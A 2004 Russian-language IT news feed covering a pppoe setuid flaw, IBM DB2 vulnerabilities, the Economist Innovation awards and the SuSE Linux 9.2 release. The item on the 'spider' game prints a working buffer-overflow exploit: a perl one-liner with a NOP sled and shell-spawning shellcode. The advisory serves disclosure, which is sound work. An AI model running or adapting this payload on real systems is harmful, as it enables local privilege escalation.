07.10.2004
Уязвимость обнаружена в pppoe драйвере в Roaring Penguin Software. Локальный пользователь может получить поднятые привилегии в некоторых конфигурациях.
Когда pppoe конфигурирован с set user id (setuid) привилегиями, то локальный пользователь может вызвать pppoe с '-D' параметром командной строки или '-p' параметром, чтобы заставить драйвер записать файл с поднятыми привилегиями.
San АНДРЕЕВ | 07.10.2004 | 12:20 | Источник: | Комментариев: 2
Переполнение буфера обнаружено в 'spider' игре для Linux систем. Локальный пользователь может получить привилегии ‘games’ группы.
Локальный пользователь может представить специально обработанный параметр командной строки, чтобы вызвать переполнение буфера и выполнить произвольный код с привилегиями группы ‘games’. Пример:
sh# spider -s `perl -e 'print "\x90" x 987 .
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80".
"\x0c\xf6\xf\xbf"'`
San АНДРЕЕВ | 07.10.2004 | 12:17 | Источник: | Комментариев: 2
Исследователи из известной секьюрити компании NGSSoftware (Next Generation Security Software) сообщают о наличии по крайней мере 20 (!) уязвимостей в выпускаемой и поддерживаемой IBM CУБД - DB2. Все уязвимости характеризуются, как "критические" и связаны с переполнением буфера, в результате чего атакующим может быть выполнен код на удалённой машине. Как пишет NGSSoftware, в настоящий момент они не собираются раскрывать детали уязвимостей в течение 3-х месяцев (до 5 января 2005 г.), чтобы дать возможность администраторам пропатчить системы. Тем временем, ISM выпущены фикспаки - FixPaks 6a и 7a. Уязвимость присутствует в IBM DB2 Universal Database версии 8.0.0 и 8.1.0 для ОС: AIX, HP-UX, Solaris, Linux и Windows.
San АНДРЕЕВ | 07.10.2004 | 12:13 | Источник: | Комментариев: 2
Премия "Economist Innovation" была учреждена для награждения самых выдающихся в своих областях деятельности личностей, несущих в мир передовые разработки, идеи и знания, помогающие прогрессу.
Награждение этой премией происходит ежегодно, а в комиссию входят такие известные личности, как Тим О'Рейли и другие отличившиеся на почве просвещения.
Премия текущего года была вручена в следующих областях:
* Биология: Дэвид Геддель - за разработки в области клонирования генов.
* Коммуникации: Вик Хайс - за разработку протокола IEEE 802.11 и всего Wi-Fi в частности.
* IT-сфера: Линус Торвальдс - за развитие opensource и Linux в частности.
* Энергетика: Такеши Ючимада - за работу над гибридно-топливным автомобилем Toyota.
А также Герд Байнинг, Генрих Рохе, Христоф Гербер - за разработку для IBM туннельных микроскопов и Мухаммед Юнус за идею микрокредитов в банках стран третьего мира.
San АНДРЕЕВ | 07.10.2004 | 12:12 | Источник: | Комментариев: 2
SuSE Linux Professional 9.2 предназначена как для компьютеров с 32-разрядными процессорами, так и для ПК с 64-разрядными чипами AMD Athlon 64 и Intel Extended Memory 64. Она основана на ядре Linux 2.6.8 и отличается поддержкой технологии Bluetooth, роуминга между беспроводными LAN и другими сетями, а также усовершенствованными средствами управления энергопотреблением и расширенной поддержкой аппаратуры. Novell ориентирует этот продукт на потребителей и технических энтузиастов.
Это уже второе обновление операционной системы в текущем году. Производители ПО open-source, такие как Novell и Red Hat, спешат предложить потребительские версии ОС, бросая вызов операционной системе Microsoft Windows. «Мы уверены, что это предложение позволит гораздо большему числу домашних пользователей легко и уверенно перейти с альтернативных систем на SuSE Linux Professional 9.2», — говорится в заявлении вице-президента Novell Маркуса Рекса.
К пакету прилагаются платформы разработки, такие как KDevelop, Eclipse и Mono, для пользователей open-source, заинтересованных в работе с Linux и с кроссплатформенными приложениями. В числе других особенностей системы повышенный уровень безопасности за счет автоматической активизации брандмауэра после инсталляции и графические интерфейсы пользователя KDE 3.3 и GNOME 2.6.
Продукт будет продаваться по цене $89,95, в которую входит поддержка инсталляции в течение 90 дней. Обновленная редакция для существующих пользователей и редакция для студентов будут стоить по $59,95.
San АНДРЕЕВ | 07.10.2004 | 12:06 | Источник: | Комментариев: 2
|
|
|